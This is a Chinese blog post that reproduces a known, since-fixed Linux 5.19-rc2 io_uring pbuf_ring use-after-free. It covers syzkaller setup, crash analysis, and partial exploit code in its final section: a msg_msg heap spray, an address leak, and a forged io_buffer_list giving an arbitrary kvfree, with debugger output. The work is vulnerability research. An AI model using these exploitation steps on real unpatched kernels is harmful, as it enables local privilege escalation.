0%

fuzz工具syzkaller的使用+io_uring模块UAF漏洞

io_uring 模块 pbuf_ring 漏洞

本篇博客主要对以下文章的内容进行复现:

1
2
/ $ uname -r
5.19.0-rc2
1
2
3
4
5
6
7
8
9
10
# Boot ./bzImage with ./rootfs.cpio as initrd on a serial console (SMEP/SMAP/PTI on,
# KASLR disabled via nokaslr); -s opens the gdb stub on tcp::1234.
qemu-system-x86_64 \
-m 512M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 panic=-1 pti=on nokaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=4 -s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
# Guest init script: mount the pseudo-filesystems, attach stdio to the
# console, then hand an unprivileged shell (uid 1000) to the user.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
# presumably busybox mdev: scan /sys and populate /dev -- verify against the rootfs
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

# Redirect stdin/stdout/stderr of this script (and its children) to the console.
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

# Start the interactive shell as uid 1000 in a new session.
setsid /bin/cttyhack setuidgid 1000 /bin/sh

# Reached only after the shell above exits.
umount /proc
umount /sys

内核源码下载:https://src.fedoraproject.org/repo/pkgs/kernel/linux-5.19-rc2.tar.xz/

  • 该漏洞已经在 5.19-rc8 中被修复
  • 在编译内核前需要先将修复的部分还原
  • 内核编译选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
CONFIG_KCOV=y        
CONFIG_VIRTIO_NET=y
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

# 可选
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

# 关闭
# CONFIG_SLAB_FREELIST_RANDOM is not set
# CONFIG_SLAB_FREELIST_HARDENED is not set

io_uring 模块的使用

io_uring 是 Linux 内核提供的异步 I/O 接口,它通过用户态与内核共享的环形队列来提交 I/O 请求并获取完成结果,从而减少系统调用开销、提高系统性能

  • io_uring 的使用案例包括文件读写、网络通信、数据库连接等
  • io_uring 通过使用用户空间和内核之间的通信机制,允许用户空间应用程序在异步 I/O 操作完成后立即获取结果,而无需等待内核完成磁盘操作或其他内核操作

io_uring 的实现仅仅使用了三个 syscall:

  • io_uring_setup:设置 io_uring 上下文
  • io_uring_enter:提交并获取完成任务
  • io_uring_register:注册内核用户共享的缓冲区

基于共享内存,io_uring 维护了两个与内核共享的队列:

  • submit 队列:用于存储待提交的 I/O 请求
  • completion 队列:用于存储 I/O 请求的完成状态

submit 队列中的 I/O 请求与 completion 队列中的 I/O 完成事件之间没有固定的顺序对应关系(完成顺序可能与提交顺序不同),用户态程序通过每个请求携带的 user_data 字段把完成事件与对应的请求关联起来

  • 由于 submit / completion 队列属于用户态程序与内核的共享空间
  • 内核只需要读取 submit 队列中的参数就可以执行相应的内核态函数,不需要执行系统调用
  • 当数据执行完毕时,内核又会将返回数据写入 completion 队列

使用案例如下:(文件读写)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
// gcc -o io_uring io_uring.c -luring -fno-stack-protector -no-pie -g
#include <fcntl.h>
#include <liburing.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 1024

/*
 * Minimal liburing example: read up to BUF_SIZE bytes from "test.txt" with a
 * single asynchronous read request and print them.
 *
 * Returns 0 on success and 1 on any failure. liburing calls report errors as
 * negative errno values in their return value (they do not set errno), so the
 * messages are built with strerror(-ret).
 */
int main(void) {
    const char *filename = "test.txt";
    struct io_uring ring;
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    char *buf;
    int fd;
    int ret;
    int status = 1;

    /* One extra zeroed byte so the data can be printed as a C string. */
    buf = calloc(1, BUF_SIZE + 1);
    if (!buf) {
        perror("calloc");
        return 1;
    }

    fd = open(filename, O_RDONLY);
    if (fd < 0) {
        perror("open");
        goto out_free;
    }

    /* Create the ring (uses the io_uring_setup system call underneath). */
    ret = io_uring_queue_init(1, &ring, 0);
    if (ret < 0) {
        fprintf(stderr, "io_uring_queue_init: %s\n", strerror(-ret));
        goto out_close;
    }

    /* Take a free submission queue entry and describe the read in it. */
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "io_uring_get_sqe: submission queue is full\n");
        goto out_ring;
    }
    io_uring_prep_read(sqe, fd, buf, BUF_SIZE, 0);

    /* Hand the request to the kernel (uses io_uring_enter underneath). */
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        fprintf(stderr, "io_uring_submit: %s\n", strerror(-ret));
        goto out_ring;
    }

    /* Block until the completion for the request is available. */
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        fprintf(stderr, "io_uring_wait_cqe: %s\n", strerror(-ret));
        goto out_ring;
    }

    /* cqe->res is the read(2)-style result: byte count or negative errno. */
    if (cqe->res < 0) {
        fprintf(stderr, "read: %s\n", strerror(-cqe->res));
    } else {
        buf[cqe->res] = '\0';
        printf("%s", buf);
        status = 0;
    }
    /* Mark the completion as consumed so its slot can be reused. */
    io_uring_cqe_seen(&ring, cqe);

out_ring:
    io_uring_queue_exit(&ring);
out_close:
    close(fd);
out_free:
    free(buf);
    return status;
}

syzkaller 的安装与使用

syzkaller 是一个覆盖率引导(coverage-guided)的内核 fuzz 工具,它根据系统调用描述自动生成并变异系统调用序列,在目标内核上执行这些测试用例,以触发并发现内核中的错误

syzkaller 的主要功能包括自动生成、测试和报告内核错误

syzkaller 使用 Go 语言编写,因此需要获取 go 语言的 tool chain(经过测试,现在最新版的 syzkaller 需要 1.19 版本的 go 环境)

1
2
3
4
wget -c https://dl.google.com/go/go1.19.2.linux-amd64.tar.gz
tar -xf go1.19.2.linux-amd64.tar.gz
sudo cp go/bin/go /usr/local/bin
sudo cp -r go /usr/local

安装 syzkaller:

1
2
3
git clone https://github.com/google/syzkaller
cd syzkaller
make

编译完成后,在 syzkaller 目录下会出现一个 bin 目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
bin
├── linux_amd64
│   ├── syz-execprog
│   ├── syz-executor
│   ├── syz-fuzzer
│   └── syz-stress
├── syz-db
├── syz-manager
├── syz-mutate
├── syz-prog2c
├── syz-repro
├── syz-runtest
├── syz-sysgen
└── syz-upgrade
  • 如果 syzkaller/bin 目录下没有 syz-extract、syz-sysgen 这两个文件,需要执行如下命令编译:
1
2
make bin/syz-extract
make bin/syz-sysgen

使用 syzkaller 前,先新建一个 workdir 目录,并新建一个 config 文件用于配置运行所需参数(命名为 test.cfg)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa", /* ssh key */
"workdir": "/home/yhellow/pwntest/workdir", /* 本地工作目录 */
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2", /* 内核源码位置 */
"syzkaller": "/home/yhellow/Tools/syzkaller", /* syzkaller工具目录 */
"sandbox": "setuid",
"type": "isolated",
"vm": {
"targets" : [ "127.0.0.1:10021" ], /* 虚拟机ip:10021 */
"pstore": false,
"target_dir" : "/root/fuzzdir", /* 虚拟机工作目录 */
"target_reboot" : false
}
}

在开始 fuzz 之前需要先配置 Image 镜像

首先安装 debootstrap,它是 linux 下用来构建一套基本根文件系统的工具:

1
sudo apt-get install debootstrap

之后在 linux 项目目录下键入以下命令,以创建 Debian Bullseye Linux image:

1
2
3
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh

上述操作全部完成后,执行以下命令来尝试启动:

1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 2G \
-smp 2 \
-kernel ./bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
-drive file=./image/bullseye.img,format=raw \
-net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
-net nic,model=e1000 \
-enable-kvm \
-nographic \
-pidfile vm.pid 2>&1 | tee vm.log

然后测试 ssh 能否成功工作,因为 syzkaller 会用到 ssh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  pwntest ssh -i ./image/bullseye.id_rsa -p 10021 -o "StrictHostKeyChecking no" root@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:jAtZl0868l4KSK75H0o0bE+7bXydTB4iDwkp68qT2Dk.
Please contact your system administrator.
Add correct host key in /home/yhellow/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/yhellow/.ssh/known_hosts:1
remove with:
ssh-keygen -f "/home/yhellow/.ssh/known_hosts" -R "[localhost]:10021"
Password authentication is disabled to avoid man-in-the-middle attacks.
Keyboard-interactive authentication is disabled to avoid man-in-the-middle attacks.
Linux syzkaller 5.19.2 #10 SMP PREEMPT_DYNAMIC Thu Dec 7 02:17:49 CST 2023 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
A valid context for root could not be obtained.
Last login: Wed Dec 6 18:22:26 2023
root@syzkaller:~#

如果遇到以下报错可以参考如下的解决方案:

1
kex_exchange_identification: read: Connection reset by peer

先启动内核,后启动 fuzz:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  pwntest /home/yhellow/Tools/syzkaller/bin/syz-manager -config=test.cfg
2023/12/07 02:53:47 loading corpus...
2023/12/07 02:53:47 serving http on http://127.0.0.1:56741
2023/12/07 02:53:47 serving rpc on tcp://127.0.0.1:39647
2023/12/07 02:53:47 booting test machines...
2023/12/07 02:53:47 wait for the connection from test machine...
2023/12/07 02:54:01 machine check:
2023/12/07 02:54:01 syscalls : 2123/4451
2023/12/07 02:54:01 code coverage : enabled
2023/12/07 02:54:01 comparison tracing : CONFIG_KCOV_ENABLE_COMPARISONS is not enabled
2023/12/07 02:54:01 extra coverage : enabled
2023/12/07 02:54:01 delay kcov mmap : enabled
2023/12/07 02:54:01 setuid sandbox : enabled
2023/12/07 02:54:01 namespace sandbox : enabled
2023/12/07 02:54:01 Android sandbox : enabled
2023/12/07 02:54:01 fault injection : CONFIG_FAULT_INJECTION is not enabled
2023/12/07 02:54:01 leak checking : CONFIG_DEBUG_KMEMLEAK is not enabled
2023/12/07 02:54:01 net packet injection : /dev/net/tun does not exist
2023/12/07 02:54:01 net device setup : enabled
2023/12/07 02:54:01 concurrency sanitizer : /sys/kernel/debug/kcsan does not exist
2023/12/07 02:54:01 devlink PCI setup : PCI device 0000:00:10.0 is not available
2023/12/07 02:54:01 NIC VF setup : PCI device 0000:00:11.0 is not available
2023/12/07 02:54:01 USB emulation : /dev/raw-gadget does not exist
2023/12/07 02:54:01 hci packet injection : /dev/vhci does not exist
2023/12/07 02:54:01 wifi device emulation : /sys/class/mac80211_hwsim/ does not exist
2023/12/07 02:54:01 802.15.4 emulation : /sys/bus/platform/devices/mac802154_hwsim does not exist
2023/12/07 02:54:01 swap file : enabled
2023/12/07 02:54:01 corpus : 179 (deleted 0 broken)

开始 fuzz 后,在 http://127.0.0.1:56741/ 可以查看详细信息:

1701887988901

syscall description 的编写

syzkaller 自己定义了一套描述系统调用模版的声明式语言 syzlang

  • 为了提高 fuzz 效率,我们必须为目标系统量身定制这种声明文件
  • 通常一个设备节点对应一个声明文件
  • 所谓的声明文件就是一个 txt,根据 syzkaller 定义的语法,在这个 txt 文档中描述设备节点的接口信息以及参数格式

整个定制过程分为4步:

  1. 根据目标内核模块的信息,撰写符合 syzlang 语法的 txt 声明文件
  2. syz-extract 根据 txt 及 linux 源码,提取符号常量的值,生成中间文件(.const 文件)
  3. syz-sysgen 根据 const 文件生成 syzkaller 执行时使用的 go 文件
  4. 重新编译 syzkaller

使用如下命令编译自定义模块:

1
bin/syz-extract -os linux -arch amd64 -sourcedir "/home/yhellow/pwntest/code/linux-5.19.2" test.txt

编译完成后运行 syz-sysgen,然后重新编译 syzkaller:

1
2
3
bin/syz-sysgen
make generate
make
  • 该步骤将更新 /syzkaller/sys/linux/gen/amd64.go,自动添加上新定义的系统调用

syzkaller 源码中的 /syzkaller/sys/linux 目录下专门记录有各个常用模块的 syzlang 文档(已经编译完成),本实验我们需要使用 io_uring.txt

为了提高 fuzz 效率,增加了 “enable_syscalls” 项,只允许某些系统调用,能更快地触发漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"target": "linux/amd64",
"http": "127.0.0.1:56741",
"rpc": "127.0.0.1:0",
"sshkey" : "/home/yhellow/pwntest/image/bullseye.id_rsa",
"workdir": "/home/yhellow/pwntest/workdir",
"kernel_obj": "/home/yhellow/pwntest/code/linux-5.19-rc2",
"syzkaller": "/home/yhellow/Tools/syzkaller",
"sandbox": "setuid",
"type": "isolated",
"enable_syscalls":[
"io_uring_register$IORING_REGISTER_PBUF_RING", /* 漏洞所在模块 */
"io_uring_setup"
],
"vm": {
"targets" : [ "127.0.0.1:10021" ],
"pstore": false,
"target_dir" : "/root/fuzzdir",
"target_reboot" : false
}
}

分析 crash 文件

所有 fuzz 出的 crash 信息都存储在 /workdir/crashes

当 syzkaller fuzz 遇到 crash 后会尝试复现该 crash:(并不是每一次都能成功)

1701933275474

当 syzkaller 成功复现 crash 时,会出现如下信息:

1701933554055

  • PS:有时候复现的 C 代码特别奇怪,也不能触发 crash,不能完全采信

漏洞分析

分析核心系统调用 syscall(__NR_io_uring_register) 对应的内核源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/*
 * Excerpt of the kernel's io_uring_register() dispatcher as quoted by the
 * write-up ("......" marks elided cases). After the dying-ref and
 * restriction checks it switches on opcode; only the
 * IORING_REGISTER_PBUF_RING case is shown.
 */
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

/*
* We're inside the ring mutex, if the ref is already dying, then
* someone else killed the ctx or is already going through
* io_uring_register().
*/
if (percpu_ref_is_dying(&ctx->refs))
return -ENXIO;

if (ctx->restricted) {
if (opcode >= IORING_REGISTER_LAST)
return -EINVAL;
opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
if (!test_bit(opcode, ctx->restrictions.register_op))
return -EACCES;
}

switch (opcode) {
......
case IORING_REGISTER_PBUF_RING:
ret = -EINVAL;
if (!arg || nr_args != 1)
break;
ret = io_register_pbuf_ring(ctx, arg); /* the vulnerable function */
break;
......
default:
ret = -EINVAL;
break;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/*
 * Quoted (unpatched) kernel code that registers a provided-buffer ring for
 * buffer group reg.bgid: validates the user-supplied registration, finds or
 * allocates the io_buffer_list, pins the user pages holding the ring and
 * records them in the list. Returns 0 on success or a negative errno.
 */
static int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_ring *br;
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;
struct page **pages;
int nr_pages;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

if (reg.pad || reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) { /* allocate the io_buffer_list array for this io_uring context */
int ret = io_init_bl_list(ctx); /* this allocates ctx->io_bl[64] */
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid); /* look up the buffer list for the given buffer group id */
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->buf_nr_pages || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

pages = io_pin_pages(reg.ring_addr,
struct_size(br, bufs, reg.ring_entries),
&nr_pages); /* pin the user pages (FOLL_PIN) */
if (IS_ERR(pages)) {
/*
 * NOTE: bl is freed here even when it came from io_buffer_get_list()
 * above rather than from kzalloc(). Per the write-up this is the bug:
 * bl can then be an element of the ctx->io_bl array, and ctx->io_bl is
 * not cleared afterwards.
 */
kfree(bl);
return PTR_ERR(pages);
}

br = page_address(pages[0]); /* address of the buffer ring */
bl->buf_pages = pages;
bl->buf_nr_pages = nr_pages;
bl->nr_entries = reg.ring_entries;
bl->buf_ring = br;
bl->mask = reg.ring_entries - 1;
io_buffer_add_list(ctx, bl, reg.bgid); /* sets bl->bgid = reg.bgid and adds it to the ctx XArray */
return 0;
}
  • 首先检查传入的参数,并在 io_uring_context 中分配 io_buffer_list 对象数组 ctx->io_bl
  • 然后根据参数中的缓冲区组ID找到对应的 io_buffer_list 对象
  • 然后调用 io_pin_pages 尝试根据用户给定的地址和长度分配 FOLL_PIN 的页
  • 如果分配失败,就直接释放掉 io_buffer_list 对象(变量 bl 指向的是对象数组中的一项,不能单独释放,因而触发报错)

变量 bl=&ctx->io_bl[bgid],如果 bgid=0,就可以释放整个 ctx->io_bl(不会触发报错),但是释放之后并没有清除 ctx->io_bl,后续使用就会造成 UAF

  • PS:从后续修复的代码来看,设计者可能只是想释放由 kzalloc(sizeof(*bl), GFP_KERNEL) 申请的内存,但是没有考虑周全

入侵思路

有 UAF 的对象大小为 0x800(使用 kmalloc-2k),可以尝试利用 msg_msg 占用 UAF 堆块,然后利用 io_provide_buffers() 在链表 ctx->io_bl[0].buf_list 上添加一个 io_buffer 对象

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
   init_io_uring();

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

do_free_first();

puts("try to get UAF object");

struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

/* 将io_buffer链接到ctx->io_bl[0],伪造一个msg_msg对象 */
void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = pbuf; // io_buffer->addr对应msg_msg->m_type
sqes->len = 0xFD0; // io_buffer->len对应msg_msg->m_ts
sqes->buf_group = 0; // 链接到ctx->io_bl[buf_group](这里'0'对应msg_msg的头部, 可以伪造msg_msg)
submit_provide_buffer();

/* 从ctx->io_buffer_cache中分配两对象,获取指向ctx->io_bl[33]的指针,从而找到kmalloc-2k的地址 */
for (int i = 0; i < 0x2; i++) {
sqes->addr = malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21; /* 0x420后面的都是可用的io_buffer_list(没有被msg_msg覆盖),因此链接到0x420这个位置(0x420/0x20=0x21) */
submit_provide_buffer();
}

puts("submit_provide_buffer");

uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

while (*tag == 0xdeadbeef) ;

正常状态下的 io_buffer_list

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:0000│ rdi rbp 0xffff8880059f6800 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059f6800 ◂— 0xffff8880059f6800
02:00100xffff8880059f6810 ◂— 0x0
03:00180xffff8880059f6818 ◂— 0x0
04:00200xffff8880059f6820 ◂— 0xffff8880059f6820
05:00280xffff8880059f6828 —▸ 0xffff8880059f6820 ◂— 0xffff8880059f6820
06:00300xffff8880059f6830 ◂— 0x1
07:00380xffff8880059f6838 ◂— 0x0

msg_msg 覆盖后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059d56c0 —▸ 0xffff8880059f6800 ◂— 0xffff8880059d56c0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • msg_msg 覆盖大小为 0x420,后续的 io_buffer_list 正常
1
2
3
4
5
6
7
pwndbg> telescope 0xffff8880059f6800+0x420
00:00000xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0xffff8880059f6c20
01:00080xffff8880059f6c28 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0x0
02:00100xffff8880059f6c30 ◂— 0x21 /* '!' */
03:00180xffff8880059f6c38 ◂— 0x0
04:00200xffff8880059f6c40 ◂— 0xffff8880059f6c40
05:00280xffff8880059f6c48 —▸ 0xffff8880059f6c40 ◂— 0xffff8880059f6c40

添加 io_buffer 对象后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0x0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • 对于 msg_msg 而言,程序会误以为 io_buffer 对象也是 msg_msg 结构体
  • 打印位于 ctx->io_buffer_cache 中的 io_buffer 对象:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0xffff888005a16000
/* 第1个io_buffer对象 */
00:00000xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff888005a16000
01:00080xffff888005a16008 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 ◂— 0x0
02:00100xffff888005a16010 —▸ 0x1000 (cpu_debug_store) ◂— 0x0
03:00180xffff888005a16018 ◂— 0xfd0
/* 第2个io_buffer对象 */
04:00200xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0xffff888005a16020
05:00280xffff888005a16028 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0x0
06:00300xffff888005a16030 —▸ 0x1bd2b80 ◂— 0x0
07:00380xffff888005a16038 ◂— 0x21000000000100
/* 第3个io_buffer对象 */
08:00400xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0xffff888005a16040
09:00480xffff888005a16048 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0x0
0a:00500xffff888005a16050 —▸ 0x1bd2c90 ◂— 0x0
0b:00580xffff888005a16058 ◂— 0x21000000000100
  • 新添加的第2,3个 io_buffer 对象都会链接到 ctx->io_bl[33] 构成循环链表,利用这一点可以泄露 ctx->io_bl 的地址(UAF 对象的地址)

接下来我想尝试正常释放 ctx->io_bl 并用其他内核结构体占位,但不管是 io_unregister_pbuf_ring 还是 io_destroy_buffers 都会因为 io_buffer_list 的结构被破坏而执行失败

这里文章采用的利用思路是:

  • 利用 msg_msg 伪造 io_buffer_list 对象
  • 然后通过 kvfree(bl->buf_pages) 获取 kmalloc-2k 上的任意地址 free
  • 构造对象重叠以备后续利用

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
    msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0); /* 创建new msg_msg */

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p); /* 创建io_ring_ctx */
/* ps:由于没有开启slub随机化,UAF msg_msg,new msg_msg,io_ring_ctx,三者相邻 */

ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0); /* 释放UAF msg_msg */

#define IDX(x) (((x)-0x30) / 8)

uint64_t* tmp = (uint64_t*)msg->mtext; // 伪造io_buffer_list
tmp[IDX(0x40)] = io_bl + 0x60; // fake_bl.buf_pages
tmp[IDX(0x48)] = io_bl; // fake_bl.buf_ring(指向可读区域)
tmp[IDX(0x50)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0x60)] = io_bl + 0x68; // 被当做buf_pages[0]
tmp[IDX(0x68)] = 0xdeadbeef; // 被当做page对象

tmp[IDX(0x80)] = io_bl + 0xa0; // fake_bl.buf_pages
tmp[IDX(0x88)] = io_bl; // fake_bl.buf_ring(指向可读区域)
tmp[IDX(0x90)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0xa0)] = io_bl + 0x1000; // 被当做buf_pages[0]

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0); /* 重新申请UAF msg_msg */

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1); /* 利用__io_remove_buffers()进行任意地址kvfree() */

打印 UAF 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> telescope 0xffff888005a33800
00:00000xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
01:00080xffff888005a33808 —▸ 0xffff8880059e54c0 —▸ 0xffff888005a33800 ◂— 0xffff8880059e54c0
02:00100xffff888005a33810 ◂— 0x1
03:00180xffff888005a33818 ◂— 0x7d0
04:00200xffff888005a33820 ◂— 0x0
05:00280xffff888005a33828 —▸ 0xffff88800586a288 ◂— 0x1
06:00300xffff888005a33830 ◂— 0x0
07:00380xffff888005a33838 ◂— 0x0
08:00400xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
09:00480xffff888005a33848 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
0a:00500xffff888005a33850 ◂— 0x10000
0b:00580xffff888005a33858 ◂— 0x0
0c:00600xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
0d:00680xffff888005a33868 ◂— 0xdeadbeef
0e:00700xffff888005a33870 ◂— 0x0
0f:00780xffff888005a33878 ◂— 0x0
10:00800xffff888005a33880 —▸ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
11:00880xffff888005a33888 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
12:00900xffff888005a33890 ◂— 0x10000
13:00980xffff888005a33898 ◂— 0x0
14:00a0│ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
  • 此时已经成功伪造了 io_buffer_list
1
2
3
4
5
0xffffffff8132fb6f <__io_uring_register+623>    call   __io_remove_buffers.isra.0           >
rdi: 0xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0xffffffff
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff8132fb64 (__io_uring_register+612) ◂— mov esi, 0xffffffff
1
2
3
4
5
0xffffffff81325ebe <__io_remove_buffers.isra.0+270>    call   kvfree            <kvfree>
rdi: 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0x0
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff81325eb8 (__io_remove_buffers.isra.0+264) ◂— mov rdi, qword ptr [rbx]
  • 这里将会释放 io_buffer_list 内部的内存区域,实现堆重叠

